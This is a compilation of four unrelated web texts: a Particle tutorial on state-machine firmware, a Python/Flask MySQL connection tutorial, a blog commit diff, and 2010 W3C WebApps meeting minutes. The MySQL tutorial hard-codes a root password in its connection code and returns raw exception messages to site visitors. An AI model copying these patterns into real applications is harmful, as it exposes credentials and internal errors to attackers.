These will be described below. For the specific state, STATE_WAIT_CONNECTED, it does the following:

- If the connection to the cloud has been established, go into STATE_PUBLISH state.
- If it's taken too long to connect (based on the value of connectMaxTime), go into STATE_SLEEP state.
- Otherwise, hang out in this state.

void loop() {
    switch(state) {
    case STATE_WAIT_CONNECTED:
        // Wait for the connection to the Particle cloud to complete
        if (Particle.connected()) {
            Log.info("connected to the cloud in %lu ms", millis() - stateTime);
            state = STATE_PUBLISH;
            stateTime = millis();
        }
        else if (millis() - stateTime >= connectMaxTime.count()) {
            // Took too long to connect, go to sleep
            Log.info("failed to connect, going to sleep");
            state = STATE_SLEEP;
        }
        break;

The next state is STATE_PUBLISH. This just makes up some JSON data by reading an analog value from pin A0, then publishes it. Note that the result of Particle.publish() is stored in the publishFuture global variable. This is a particle::Future<bool>, not a plain bool. What's the difference?

Particle.publish() normally returns a bool indicating whether the publish succeeded or not. This is especially useful when also using WITH_ACK to make sure the cloud received the publish. However, this is a little annoying because it blocks until complete. This normally can take up to 20 seconds, but might take up to 5 minutes! By storing the result in a Future instead of a bool, you can still get the value from Particle.publish(), but in the future, without blocking! We always go into STATE_PUBLISH_WAIT state next to wait for the result to come in.
case STATE_PUBLISH:
    {
        // This is just a placeholder for code that you'd write for your actual situation
        int a0 = analogRead(A0);

        // Create a simple JSON string with the value of A0
        snprintf(publishData, sizeof(publishData), "{\"a0\":%d}", a0);
    }

    Log.info("about to publish %s", publishData);

    publishFuture = Particle.publish("sensorTest", publishData, PRIVATE | WITH_ACK);
    state = STATE_PUBLISH_WAIT;
    stateTime = millis();
    break;

In STATE_PUBLISH_WAIT we wait until the Particle.publish() call completes. Because the call is asynchronous, we also have an opportunity to have an additional timeout. There are two parts to the future of interest:

- publishFuture.isDone() is true when the Particle.publish() call would have returned.
- publishFuture.isSucceeded() is true if the publish succeeded. It is false if the publish failed. This should only be checked after isDone() is true.

case STATE_PUBLISH_WAIT:
    // When checking the future, isDone() indicates that the future has been resolved,
    // basically this means that Particle.publish would have returned.
    if (publishFuture.isDone()) {
        // isSucceeded() is whether the publish succeeded or not, which is basically the
        // boolean return value from Particle.publish.
        if (publishFuture.isSucceeded()) {
            Log.info("successfully published %s", publishData);
            state = STATE_SLEEP;
        }
        else {
            Log.info("failed to publish, will discard sample");
            state = STATE_SLEEP;
        }
    }
    else if (millis() - stateTime >= publishMaxTime.count()) {
        Log.info("failed to publish, timed out, will discard sample");
        state = STATE_SLEEP;
    }
    break;

The final state is STATE_SLEEP. We put the device into stop mode sleep in this state, for the length of time specified in sleepTime. Upon waking up from sleep, we go into STATE_WAIT_CONNECTED state. We'll almost always still be connected, but going into this state will catch a few fringe cases.
case STATE_SLEEP:
    Log.info("going to sleep for %ld seconds", (long) sleepTime.count());

    {
        // This is equivalent to:
        // System.sleep(WKP, RISING, SLEEP_NETWORK_STANDBY);
        SystemSleepConfiguration config;
        config.mode(SystemSleepMode::STOP)
            .gpio(WKP, RISING)
            .duration(sleepTime)
            .network(NETWORK_INTERFACE_CELLULAR);

        SystemSleepResult result = System.sleep(config);
    }

    Log.info("woke from sleep");

    state = STATE_WAIT_CONNECTED;
    stateTime = millis();
    break;
    }
}

02-Linear

This example just shows what the code would look like if we didn't use a state machine. For a simple example like this it may look cleaner, but as your code gets more complex it can get unwieldy quickly!

One example of the subtle gotchas that can occur: Say you decide to enable the ApplicationWatchdog. In each of the two inner delay loops you'd also have to add a call to checkin(), otherwise the device could end up resetting if it was having trouble connecting. That's not necessary in the state machine examples because the code returns from loop() frequently.

03-If-Statement

This is basically the same as the 01-Simple example, except it uses an if statement instead of switch.

void loop() {
    if (state == STATE_WAIT_CONNECTED) {
        // ...
    }
    else if (state == STATE_PUBLISH) {
        // ...
    }
    // ...
}

It's mostly just a matter of preference.

04-Case-Function

While this example is pretty simple, you can imagine if you have a complex program, putting everything in loop() with a switch or if statement can get unwieldy! One common solution to this is to separate every state out into a separate function.

void loop() {
    switch(state) {
    case STATE_WAIT_CONNECTED:
        stateWaitConnected();
        break;

    case STATE_PUBLISH:
        statePublish();
        break;

    case STATE_PUBLISH_WAIT:
        statePublishWait();
        break;

    case STATE_SLEEP:
        stateSleep();
        break;
    }
}

void stateWaitConnected() {
    // ...
}

05-Function-Pointer

One annoyance of the 04-Case-Function example is that every time you add a new state you need to add an enum value, a case in the switch statement, and a function.
One solution to this is to just dispense with the enum and use function pointers. This is used instead of the State variable in the previous examples.

typedef void (*StateHandler)();

StateHandler stateHandler = stateWaitConnected;

Now the only thing in loop() is:

void loop() {
    stateHandler();
}

Disadvantages of this are that you can't easily print the state number to your debug log. You also can't increment state to go to the next state.

06-Class

This is the method I prefer. It uses a style similar to 05-Function-Pointer, but instead of using plain C++ functions, it uses C++ class members!

06-Class.cpp

This really empties out the main source file!

#include "MainStateMachine.h"

SYSTEM_THREAD(ENABLED);
SYSTEM_MODE(SEMI_AUTOMATIC);

Serial1LogHandler logHandler(115200);

MainStateMachine mainStateMachine;

void setup() {
    mainStateMachine.setup();
}

void loop() {
    mainStateMachine.loop();
}

MainStateMachine.h

We have a new header file, MainStateMachine.h. Here's what's in it:

You normally declare the MainStateMachine as a global variable in your main source file. You should avoid doing much in the constructor, as there are limitations on what is safe at global object construction time. Instead, you do most setup in the setup() method, which you call from the application setup(). Same with loop().

class MainStateMachine {
public:
    MainStateMachine();
    virtual ~MainStateMachine();

    void setup();
    void loop();

In this example we have these methods to override the default values. You use them fluent-style.
MainStateMachine &withConnectMaxTime(std::chrono::milliseconds connectMaxTime) { this->connectMaxTime = connectMaxTime; return *this; };

MainStateMachine &withSleepTime(std::chrono::seconds sleepTime) { this->sleepTime = sleepTime; return *this; };

MainStateMachine &withPublishMaxTime(std::chrono::milliseconds publishMaxTime) { this->publishMaxTime = publishMaxTime; return *this; };

You use these like this in your main application file:

void setup() {
    mainStateMachine
        .withConnectMaxTime(10min)
        .withSleepTime(30min)
        .setup();
}

You can chain zero or more of these and then call setup() with the changed values.

There are also class member definitions for each of our states:

protected:
    void stateWaitConnected();
    void statePublish();
    void statePublishWait();
    void stateSleep();

And this scary-looking definition! This declares stateHandler as a std::function that holds a pointer to a class member function instead of a plain C++ function.

std::function<void(MainStateMachine&)> stateHandler = 0;

MainStateMachine.cpp

The MainStateMachine.cpp file has a few interesting features. This Logger statement allows the log statements in this file to be tagged and adjustable.

static Logger log("app.msm");

Note the app.msm (Main State Machine) log statements in the serial log:

0000018272 [app.msm] INFO: woke from sleep
0000018273 [app.msm] INFO: connected to the cloud in 0 ms
0000018276 [app.msm] INFO: about to publish {"a0":1606}
0000018512 [app.msm] INFO: going to sleep for 60 seconds
0000018557 [comm.protocol] INFO: Posting 'S' describe message
0000018656 [comm.dtls] INFO: session cmd (CLS,DIS,MOV,LOD,SAV): 4
0000018665 [comm.dtls] INFO: session cmd (CLS,DIS,MOV,LOD,SAV): 3
0000018665 [comm.protocol] INFO: rcv'd message type=1

Using logging categories, you can also set the log level for these messages independently of other messages. The only thing you need to remember to do is use log.info() (lower case l in log) instead of Log.info(). Of course you can use other things like log.trace(), log.error(), etc.
as well as using sprintf-style formatting.

void MainStateMachine::setup() {
    log.info("MainStateMachine::setup()");

    Cellular.on();
    Particle.connect();

The other thing is how you need to specify the state handler class member function. It really does need to be written like that, or it won't work.

    stateTime = millis();
    stateHandler = &MainStateMachine::stateWaitConnected;
}

The loop function looks like this and calls the state handler member function (if not null). The *this parameter is necessary because it's a non-static class member function, so it needs to have this (the class instance) available to it.

void MainStateMachine::loop() {
    if (stateHandler) {
        stateHandler(*this);
    }
}

The rest of the code should look similar to the other examples (except for the weird syntax for setting stateHandler):

void MainStateMachine::stateWaitConnected() {
    // Wait for the connection to the Particle cloud to complete
    if (Particle.connected()) {
        log.info("connected to the cloud in %lu ms", millis() - stateTime);
        stateHandler = &MainStateMachine::statePublish;
        stateTime = millis();
    }
    else if (millis() - stateTime >= connectMaxTime.count()) {
        // Took too long to connect, go to sleep
        log.info("failed to connect, going to sleep");
        stateHandler = &MainStateMachine::stateSleep;
    }
}
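None of this dispatch logic is specific to Device OS. As a rough, hardware-free illustration of the 06-Class pattern, here is the same idea sketched in Python (all names here are made up for this sketch, and the cloud connection and publish steps are stubbed out since there is no device involved):

```python
import time


class PublishStateMachine:
    """Hardware-free sketch of the class-based FSM: each state is a
    method, and the current state is just a bound-method reference."""

    def __init__(self, connect_max_time=6.0):
        self.connect_max_time = connect_max_time
        self.state_handler = self.state_wait_connected
        self.state_time = time.monotonic()
        self.log = []

    def loop(self):
        # Dispatch to whichever handler is current, like stateHandler(*this)
        if self.state_handler:
            self.state_handler()

    def connected(self):
        # Stand-in for Particle.connected(); always "connected" here
        return True

    def state_wait_connected(self):
        if self.connected():
            self.log.append("connected")
            self.state_handler = self.state_publish
            self.state_time = time.monotonic()
        elif time.monotonic() - self.state_time >= self.connect_max_time:
            self.log.append("timeout")
            self.state_handler = self.state_sleep

    def state_publish(self):
        self.log.append("publish")  # a real device would publish here
        self.state_handler = self.state_sleep

    def state_sleep(self):
        self.log.append("sleep")    # a real device would sleep and loop
        self.state_handler = None


fsm = PublishStateMachine()
while fsm.state_handler:
    fsm.loop()
print(fsm.log)  # → ['connected', 'publish', 'sleep']
```

The whole trick is that transitioning states is just reassigning `state_handler`; each handler returns quickly, so one event loop can drive many such machines side by side.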
https://docs.particle.io/datasheets/app-notes/an010-finite-state-machines/
In this tutorial, we're going to introduce how we interact with a MySQL database using Python. The module that we use to do this is called MySQLdb. To get it, run the following on your server:

sudo apt-get install python-MySQLdb

Once you have that, make sure it all worked by typing:

python

That should open a Python instance on your server, so then do:

import MySQLdb

So long as that works, do a quick Ctrl+D to exit the Python instance.

Next, we want to make a Python file that can connect to the database. Generally you will have a separate "connect" file, outside of any main files you may have. This is usually true across languages, and here's why.

Initially, you may have just a simple __init__.py, or app.py, or whatever, and that file does all of your operations. What can happen in time, however, is that your website does other things. For example, with one of my websites, Sentdex.com, I perform a lot of analysis, store that analysis to a database, and I also operate a website for users to use. Generally, for tasks, you will use what is called a "cron." A cron is a scheduled task that runs when you program it to run. Generally this runs another file, almost certainly not your website's file. So then, to connect to a database, you'd have to write the database connection code again in the file being run by your cron. As time goes on, these sorts of needs stack up, where you have some files modifying the database, but you still want the website to be able to access it, and maybe modify it too.

Then, consider what might happen if you change your database password. You'd then need to go to every single file that connects to the database and change that too. So, usually, you will find the smartest thing to do is to just create one file which houses the connection code. That's what we're going to build today.
import MySQLdb

def connection():
    conn = MySQLdb.connect(host="localhost",
                           user="root",
                           passwd="cookies!",
                           db="pythonprogramming")
    c = conn.cursor()
    return c, conn

Import the module. Create a connection function to run our code. Here we specify where we're connecting to, the user, the user's password, and then the database that we want to connect to. Referencing the table will be done in the code that actually works with the table.

As a note, we use "localhost" as our host. This just means we'll use the same server that this code is running on. You can connect to databases remotely as well, which can be pretty neat. To do that, you would connect to a host by their IP, or their domain. To connect to a database remotely, you will need to first allow it from the remote database that will be accessed/modified.

Next, let's go ahead and edit our __init__.py file, adding a register function. For now we'll keep it simple, mostly just to test our connection functionality.

from dbconnect import connection

...

@app.route('/register/', methods=["GET","POST"])
def register_page():
    try:
        c, conn = connection()
        return("okay")
    except Exception as e:
        return(str(e))

We allow for GET and POST, but aren't handling them just yet. We're going to just try to run the imported connection function, which returns c and conn (cursor and connection objects). If the connection is successful, we just have the page say okay; otherwise it will output the error.

Next up, let's build our register page.
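The "one connection module" pattern above doesn't depend on MySQL specifically. Here is a minimal sketch of the same shape using Python's built-in sqlite3 module as a stand-in, so it runs without a MySQL server (the table name and in-memory database are made up purely for illustration):

```python
import sqlite3


def connection(db_path=":memory:"):
    # Same shape as the MySQLdb version: one function builds the
    # connection, and callers get back both the cursor and the
    # connection object, so only this file knows the credentials/path.
    conn = sqlite3.connect(db_path)
    c = conn.cursor()
    return c, conn


c, conn = connection()
c.execute("CREATE TABLE users (username TEXT)")        # hypothetical table
c.execute("INSERT INTO users VALUES (?)", ("alice",))  # parameterized insert
conn.commit()
c.execute("SELECT username FROM users")
print(c.fetchone()[0])  # → alice
```

If the password or host ever changes, only the `connection()` function needs editing; every cron job and web handler that imports it keeps working unchanged.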
https://pythonprogramming.net/flask-connect-mysql-using-mysqldb-tutorial/
Relegate some posts to notes

5 files changed, 3 insertions(+), 43 deletions(-)

D content/java-after-17-years/contents.lr
R content/{asus-zenbook-ux303la-2014-review/contents.lr => notes/notes-on-asus-zenbook-ux303la-2014/contents.lr}
R content/{review-of-lg-q-stylus/contents.lr => notes/notes-on-lg-q-stylus/contents.lr}
R content/{rms-score/contents.lr => notes/rms-score/contents.lr}
D content/tags/java/contents.lr

D content/java-after-17-years/contents.lr => content/java-after-17-years/contents.lr -31

@@ -1,31 +0,0 @@
-title: Java after 17 years
----
-body:
-
-After seventeen years, I have run my first Java program all over again. Here it is in all its glory.
-
-```
-package com.company;
-
-public class Main {
-    public static void main(String[] args) {
-        System.out.println(String.format("Add %s to CV. ✔", "Java"));
-    }
-}
-```
-
-Output:
-
-```
-Add Java to CV. ✔
-```
-
-I submit this as a contender for the next Hello, World!
----
-pub_date: 2020-09-20
----
-subtitle: hello world
----
-tags: java

R content/{asus-zenbook-ux303la-2014-review/contents.lr => notes/notes-on-asus-zenbook-ux303la-2014/contents.lr} -3

@@ -1,4 +1,4 @@
-title: Asus Zenbook UX303LA 2014 Review
+title: Notes on Asus Zenbook UX303LA 2014
 ---
 body:
@@ -77,8 +77,6 @@ I found 100s, if not 1000s, of users who had the exact same issue after the exac
 You will not go that wrong with Dell or Thinkpad if your budget is above $600.
 My personal recommendation is either the T or the X series of the Thinkpad line.</p>
 ---
-tags: review
----
 pub_date: 2015-01-25
 ---
 last_updated_date: 2015-08-14

R content/{review-of-lg-q-stylus/contents.lr => notes/notes-on-lg-q-stylus/contents.lr} -4

@@ -1,8 +1,6 @@
-title: Review of LG Q Stylus+ Android phone
+title: Notes on LG Q Stylus+ Android phone
 ---
-tags: review
----
-metadesc: Review of LG Q Stylus+ Android phone
+metadesc: Notes on LG Q Stylus+ Android phone
 ---
 pub_date: 2019-02-14
 ---

R content/{rms-score/contents.lr => notes/rms-score/contents.lr} -2

@@ -18,6 +18,4 @@ I got:
 > 12 non-free packages, 1.0% of 1147 installed packages.
 > 4 contrib packages, 0.3% of 1147 installed packages.
 ---
-tags: linux
----
 pub_date: 2012-04-15

D content/tags/java/contents.lr => content/tags/java/contents.lr -3
https://git.sr.ht/~animesh/anmsh.net/commit/73621677356d6861000fac93868a4a49c516af1d
See also: IRC log

<Barstow> ScribeNick: MikeSmith
<Barstow> Scribe: Mike_Smith
<Barstow> Date: 2 November 2010
<scribe> scribe: MikeSmith
<shepazu>
<shepazu>
shepazu: first is to our tracker page … does not have every issue … because CLOSED issues don't show up … this represents most of our LC technical comments … we figured we might have to go through LC again … we will be adding the locale string … as we discussed yesterday … we will be making small changes … improving wording … editorial explanations … going to LC again in Jan … this time "for reals"
<scribe> … pending any upheavals … doesn't specify every possible thing … we had a comment from Garrett Smith … also from Ample SDK
anne: Sergei Ilinsky
shepazu: wants to modularize … and Anne wants to modularize more too
shepazu: introduces all the things that were in DOM2 events … plus text input, keyboard input, one mutation event … though we have deprecated all the other mutation events
shepazu: I think we are more or less feature complete
anne: I'm the editor of DOM Core … I think it makes sense for DOM Core to define mutation events
anne: similar to how we define Form events inside the Forms spec
shepazu: we removed some Form-related events and those were moved to the Forms spec
mjs: How about making mutation events die in a fire? ...
I agree, if they have really tight coupling to DOM behavior, it makes sense to have them in the same place … but there are some cases that don't require tight coupling at all
weinig: some of our changes are pending that they don't break major editing sites … our goal is to turn it on and see what sites break
anne: 
smaug_: I don't understand why we are moving mutation events … I thought everybody just wanted them removed
mjs: I think the DOM events mechanism really has become part of the core
smaug_: yeah, but some specs may reference DOM events, but don't need to use DOM core
mjs: there is almost no way to use DOM events without also using DOM core
anne: what is an example where it's the case that something relies on DOM events but not DOM core
smaug_: some specs just extend [by adding new events and so don't need to reference DOM core]
shepazu: anne, please explain what you want to move, specifically
<mjs> anne: there is a part called "Basic Event Interfaces" … it would make sense to split that part out
shepazu: that is the core of DOM3 Events…
anne: in addition to that, I think the mutation events should move too
mjs: smaug, I think your dependency argument doesn't work [because the dependencies are complex]
anne: this is implementable in Java
<mjs> what I said about dependencies is that DOM3 Events has a normative dependency on DOM 3 Core
<mjs> so there's no such thing as depending on DOM Events without depending on DOM Core
Art: anybody else have comments?
adrianba: I don't have a strong opinion about where we go in the long term … there is plenty of time to talk about it … right now there is an Event spec … which is what we are targeting in IE9 … it seems like the wrong time now to start cutting up the problem space in a different way … let's move the spec forward as it is
adrianba: we are chartered to work on a new async spec for [something like mutation events] ...
stabilizing what we have now and moving forward seems like the right thing
mjs: my preference would be to move forward but plan [to move things to DOM Core later]
smaug_: I agree … let's get DOM3 Events done now … DOM Core will take years
adrianba: we have implemented some of the mutation events … we all understand the problems with mutation events
anne: I am afraid we are getting stuck with mutation events
adrianba: we are kind of stuck with them anyway
shepazu: if you are going to do part of it, it should all be in one spec
anne: what do you mean by all? ... I don't think mouse events belong together with it
shepazu: I would agree that we should move DOM3 Events forward as it stands
anne: I don't think labeling them as deprecated helps us all that much
mjs: if the number of implementations is increasing, then [clearly it's not helping]
anne: making them async would be a big start
smaug_: we don't know that that will work ... there are some other approaches that are not event-based ... it is possible to remove some features from the platform … it has been done
shepazu: deprecation is a warning to authors ... it's not helpful to remove them from the spec at this point
weinig: if they were removed from DOM3 Events, would MSFT consider not adding them in IE9
[adrian shakes his head]
shepazu: they are only supporting some of them
adrianba: we are supporting them for interoperability reasons
shepazu: they are in the spec because implementors asked for them to be in the spec
art: I noticed a big list of issues
shepazu: a bunch of them are from David Flanagan [book author]
shepazu: Oli, Travis, Jacob Rossi, myself discussed them … we have agreed already to accept most of the comments … and have heard no objections from the list
shepazu: event.timestamp is one that we have still been discussing
art: can you do all 50 of these by the end of the year?
shepazu: we can round-trip on these by end of January ...
if nobody has more comments, let's move on
art: we don't have our next topic scheduled until 11am
shepazu: a lot of people have said why don't you specify the console object
weinig: we just copied the console API into WebKit
mjs: there are a few things around console that are Web-compatibility issues ... having to do with devs using console calls in their scripts even after they have done debugging
weinig: there are a couple problems ... we don't think operations on the console should be visible to Web pages … we made some mistakes around that
mjs: the fact that console.log exists and doesn't have potentially … -> Console API
adrianba: we have implemented the console in IE8-IE9 ... there is a session tomorrow to discuss a new community-driven spec-dev approach … this might be a good case to use as a pilot … for that approach
shepazu: about 6 months ago, we got in contact with some devs who were working on an API for programmatically writing and reading audio streams … and we started an Incubator Group … XG
<Barstow> Audio XG Charter:
shepazu: and right now, Mozilla has a related API they have developed … and the Google Chrome team has a related API as well
shepazu: and we have decided to start a new WG
<Barstow> Audio XG's mail list archive:
<Barstow> Mike: Chrome team is working on this API
<Barstow> ... think we want broader participation
shepazu: we would probably start the WG by February or so
Barstow: we will be back at 11am with anne at the podium ... XHR1 test suite, and XHR1 issues
[we take a 1 hour break]
<anne>
<ArtB> ACTION: barstow ask Doug for a pointer to Google's "Before Input Proposal" [recorded in]
<trackbot> Created ACTION-608 - Ask Doug for a pointer to Google's "Before Input Proposal" [on Arthur Barstow - due 2010-11-09].
<ArtB> issue-119?
<trackbot> ISSUE-119 -- Consider adding input/keyboard locale to text and keyboard events -- open
<trackbot>
<Barstow> ScribeNick: timeless_mbp
<timeless> ScribeNick: timeless
Scribe+ timeless
ArtB: Anne will be talking about XHR Level 1 Test Suite
<anne> and
… and Level 1 issues
anne: XHR Level 1 went to CR … which means it's awaiting implementations … of course XHR has been implemented long ago already … there is a test suite which has been announced on the list … but there has been little response … Since people are here now, I guess I can ask people directly
sicking: I haven't looked at the testsuite yet, but is it fully automated?
anne: you need a test harness, but it is automated: a test is loaded and says PASS/FAIL
sicking: i think one of our desires is that things be as automated as possible
anne: I agree
<anne> … ? there is a testharness that it's written for, which is used for other testsuites from this group
[ anne describes how individual tests are structured ]
adrianba: how much has the test suite changed recently?
anne: the framework changed to make it the same as the HTML WG … quite a few changed because a number weren't matching the spec anymore … the old testsuite was quite outdated … some tests have been removed … the number of tests has gone down, because some test assertions were combined into a single test
dom: did you follow any specific method to ensure every feature has been tested?
anne: um, no … i tried reading carefully to ensure everything is covered
artb: do you think anything is missing?
anne: there's an open item in the issue database about credentials in urls … the tests around that and authentication are not done yet
<dom> (should known bugs in the test suite be documented somewhere?)
<timeless_mbp> bryan: did you want to test posts?
<timeless_mbp> … for redirects (?)
<timeless_mbp> anne: i didn't want to because HTTP Biz is still undecided on some of this
<timeless_mbp> … 301/302/307 ...
<timeless_mbp> sicking: another thing is that Mozilla + Opera include dialogs on 307 <timeless_mbp> … it's sort of a requirement in the HTTP spec <timeless_mbp> … but they don't have it for direct address <timeless_mbp> … they're ratholes, so not tested yet, once they're resolved they'll be tested <timeless_mbp> anne: the only accessible methods are GET and POST <timeless_mbp> sam: didn't hixie add DELETE? <timeless_mbp> anne: we got him to remove it <timeless_mbp> anne: Trailers aren't tested yet, because i didn't know about them or how to test them <timeless_mbp> sicking: so do we have to test them? <timeless_mbp> anne: i might be able to test things w/ nph- <timeless_mbp> … but i'm not sure what to expect <timeless_mbp> sicking: trailers are after the response body <timeless_mbp> anne: so i guess the text that talks about the response body would have to talk about changing the state <timeless_mbp> … as far as i'm concerned, we don't need to support it <timeless_mbp> … for readyState changes <timeless_mbp> … but do you go to the done state <timeless_mbp> sam: you said the php scripts are available in an svn server? <timeless_mbp> anne: yeah, it was the second link i posted <dom> <timeless_mbp> artb: i assume the action then is for everyone to help this spec reach the exit criteria <timeless_mbp> … is to review the tests <timeless_mbp> anne: i assume there are some spec/test items which need fixing <timeless_mbp> … there's one other small test which might need fixing <timeless_mbp> … Björn Herman <timeless_mbp> … pointed out byte order mark character <shepazu> s/Byorn Herman/Björn Höhrmann/ <timeless_mbp> artb: we had set expectations that we wouldn't exit CR before Feb 2011 <timeless_mbp> sicking: which is two conforming implementations? 
<timeless_mbp> anne: I don't think that's likely to happen <timeless_mbp> … I would encourage people to review the editor's draft instead of this <timeless_mbp> … because there have been some changes to make this closer to XHR2 <timeless_mbp> … removing some throw conditions to enable CORS <timeless_mbp> … those have been reflected in the testsuite already <timeless_mbp> … i try to keep the testsuite and the draft in sync <timeless_mbp> … that also means that if you implement to the testsuite, there shouldn't be any conflicts with XHR2 <timeless_mbp> … if there are, that would be a bug <timeless_mbp> anne: i'm not sure if we want to discuss any of the issues now <timeless_mbp> artb: that's up to you, we have some of the people in the room <timeless_mbp> anne: one of them is the user info protection in the urls <timeless_mbp> … i think microsoft doesn't implement it <timeless_mbp> … and i think the other vendors do <timeless_mbp> … so that you can have... <timeless_mbp> anne: I think the HTTP people want to remove it <timeless_mbp> sicking: I think we could try to remove it <timeless_mbp> sicking: does the spec say they must be supported? <timeless_mbp> anne: the http url spec does mention them <timeless_mbp> anne: does the url get sent to the server? <timeless_mbp> sicking: it might leak in the form of a referer header <shepazu> scribenick: timeless sicking: i'm sure the url testsuite ... anne: they are mentioned in the spec … the spec has user and password arguments … which are used to set authorization headers (?) … if we don't remove it ... 
anne: there is an issue in the bug database, i think it's the only open issue at this point
<Zakim> shepazu, you wanted to describe policy on php in test suites
shepazu: so dom followed up with the Systems Team on PHP tests
… we just got confirmation that we will be hosting the php tests
<Barstow> ACTION: barstow XHR: add link to bugzilla in PubStatus [recorded in]
<trackbot> Created ACTION-609 - XHR: add link to bugzilla in PubStatus [on Arthur Barstow - due 2010-11-09].
… any tests that involve PHP will require review by the Systems Team
… they will be hosted on the load balancing servers
anne: which servers?
dom: they'll be hosted on test.w3.org
... it would be helpful if you moved to the mercurial server
anne: i think there's a version there
… but probably not up to date
shepazu: the process will be such that you let us know when there's a specific version you want deployed
… it will not be deployed until the systems team reviews it
shepazu: i think this will come up a lot
anne: there's also the web sockets stuff
dom: i think that is more complicated and will require more work
… i think we can manage, it requires more work
shepazu: for cross domain work, i think we'll need another domain
adrianba: we already have "test" and "test2" which are cnames
dom: if you are working on any test suite that has server side things, please get in touch with the Systems Team early
anne: if you really want to test the really gritty networking stuff
… I think you will need HTTPS, certificates, DV, EV, OV,...
shepazu: those are good points
… Philippe is starting a new testing project
… so setting up a little test honey pot might be possible
dom: in general i think what's important is getting things to the REC track, so get in touch with the Systems Team earlier rather than later
<scribe> ScribeNick: timeless
artb: anything else about XHR or its testsuite?
anne: no. apart from asking people to review/give comments
bryan: is it easy to set up?
anne: yes, there's a readme
<dom> (can we record an action to update the test suite on dvcs.w3.org?)
artb: based on the feedback you've got so far on the XHR1 candidate
Action anne update the test suite on dvcs.w3.org
<trackbot> Created ACTION-610 - Update the test suite on dvcs.w3.org [on Anne van Kesteren - due 2010-11-09].
anne: Before going back to last call ...
... make sure that we have two implementations that pass all the tests
... and that the specification has all the implementations passed that
... so that when we go back to LC we can go to PR after that (skipping CR)
artb: the third bullet for this hour is a general discussion about testing
... and we've already gone down that path quite a bit
anne: we could discuss responseArrayBuffer briefly
... i'm not sure we could reach a conclusion now
sicking: I do have something to say on this
... So, the complicated issue is that...
... there's multiple topics
... the whole ongoing discussion right now about parsing...
... all requests into all response properties
... (Boris Z)
... what i'd like to do is move away from the current situation
... where we parse into multiple properties
... which is the XHR1 behavior
... I want to move to a way where you specify up front which thing you want
adrianba: I think that makes sense
... so if you know it's coming as JSON or you want it as a Blob, you can specify that
sicking: obviously we need to retain compatibility with XHR1
... and the stuff where you get a document
anne: this sounds kind of annoying
sicking: while it is nice to have things parsed into everything
... it's only nice if you don't have to consider all the resources used
... what we're talking about is Document
anne: but you only need to create Document once it's requested
... you don't have to do it all up front
sicking: in our implementation
... we'll do charset-decoding differently depending on whether we're parsing into a document or not ...
... so responseText changes depending on whether you have a document
... and the spec requires this
... everything else, JSON, Blobs, streams...
anne: streams?
sicking: we'll end up having to do it
adrianba: streams for media...
sicking: you can't set headers without this
adrianba: or you might want to process the data as it arrives
[anne was asking about using <video> ]
sam: we don't have to convince anne about streams
... more things will be using new content formats
geoffrey: there will be more and more kinds with time
anne: this screws with content negotiation
[ scribe laughs ]
sicking: one of the aspects of my proposal is that you can set .responseType after headers are received
... but before any data has been processed
anne: how would it work for sync requests?
sicking: we'd fire events
anne: but they're blocked by the sync request
sicking: you can't fire an async request, but you can fire a sync event
... that's trivial implementation-wise
... you just run code on the main thread
anne: that sounds hairy
smaug: we explicitly want to get rid of ready state change events
... because that causes hanging in safari
adrianba: i think it's fine to not support sync requests for this new feature
... because we want to push people toward async
jonas+sam: for workers sync requests are fine
anne: i'm saying you're opening a rathole
mjs: so what are we specifically talking about?
geoffrey: this was for when we receive content headers
anne: i don't think we should really fire events during a sync request
... because conceptually that's confusing/seems really weird
mjs: there's generally a separate thread buffering the data from the network
sam: the buffering is already happening
... anyone doing network handling on the main thread is probably doing something really wrong anyway
sicking: i'm suggesting this *only* for workers
anne: I guess I would have to reference Workers from XHR2
sam: we kind of think of sync as deprecated in the main context now ...
... so adding features and having them exposed for the non workers case is kind of like whatever
mjs: even in workers, i think it makes sense to encourage people to have multiple concurrent requests
... by not providing this feature for sync
sicking: i'm not sure that this has taken off
artb: time check
... we have test suites we've already covered
... and you have ...
sicking: i posted my original proposal on content negotiation to the list
... it's a long thread
... i had one more issue on byte array
... have you seen the proposal on the ecma list
... about another binary format?
anne: i'm not on the list
... i think it should align with webgl
<MikeSmith> sicking, url?
sicking: it's a long discussion
... i'll try to find the url
anne: i don't mind removing endianness
... but it would have to be aligned about webgl
sam: the reason for the endianness is that you want things in host byte order for webgl
sicking: not all details are worked out yet
... the idea is to have it be fast
... but without exposing platform endianness
... the problem is that you're talking between two languages, JS and GLSL
... david herman is the guy who made the proposal
<anne> GLSL = OpenGL Shading Language
<sicking>
<sicking>
<sicking>
artb: before we go on to DOM Core, I wanted to set aside a few minutes for testing
<Guest724> anne, are you French?!
adrianba: we submitted tests for the webapps and html WGs
<adrianba>
adrianba: i'd like to move away from a system where we have a different process per spec for submission
... we have some tests which we have committed to the mercurial repository - i just pasted the link
... when I was talking to doug, he was trying to develop tests alongside the spec
... we/he found that if you develop tests as you develop the spec, it's easier to find spec issues
... there's a question of where to put tests as things are developed
... and keep aware of which things are agreed upon tests, which are under development,
... which aren't agreed
sicking: we should try to require tests to be automatically runnable
<Barstow> ACTION: barstow work with Team and Chaals on formalizing test suite process for WebApps [recorded in]
<trackbot> Created ACTION-611 - Work with Team and Chaals on formalizing test suite process for WebApps [on Arthur Barstow - due 2010-11-09].
anne: ... whenever possible
adrianba: i think the work that anne did to refactor the XHR test suite to use the same framework as the HTML tests
... he should receive credit for that, because it made things much easier to review
sicking: when mozilla started adding tests to a framework
... it made things much better
... So if we have a formalized framework, we should pick one, and force everyone [in the webapps WG] to use that one
artb: for new tests...
shepazu: certainly most of the tests around browser stuff should use the same framework
... there's probably some stuff in W3C outside of browser context where this doesn't make sense
... the SVG group has also agreed to move to the same framework
... with SVG2, things are not going to go into the spec without having tests added
... until we do that, we'll mark things as under review
... I guess i'm just offering a +1 for a common framework as much as possible
... have we talked about testing with WebIDL?
... because if you describe stuff in a spec with webidl, you're going to be able to extract that and do a certain amount of automated tests
... or not?
sicking: i'm more of a fan of handwritten tests
... i'll believe it when i see it
dom: there was a perl tool that i mentioned on public-script-coord ...
... that generated tests from idl
... But I agree with jonas that it's better to start with manual tests
adrianba: the model is that you can use automatic creation to generate simpler basic tests to supplement hand-written tests
sicking: at mozilla we're also looking into automatically testing things that aren't automatically testable ...
... such as testing interacting with a file picker
... things which require apis which aren't web accessible
AnssiK: about functional testing... do you have things other than unit testing?
sicking: what we do is that we expose a lot of stuff to javascript
... to have javascript override the dialog
... we can also fake real clicks on things
... it's being rewritten because the way we did it is not good
<dom> perl tool to generate test cases based on WebIDL
AnssiK: there's a thing called Selenium
[ ]
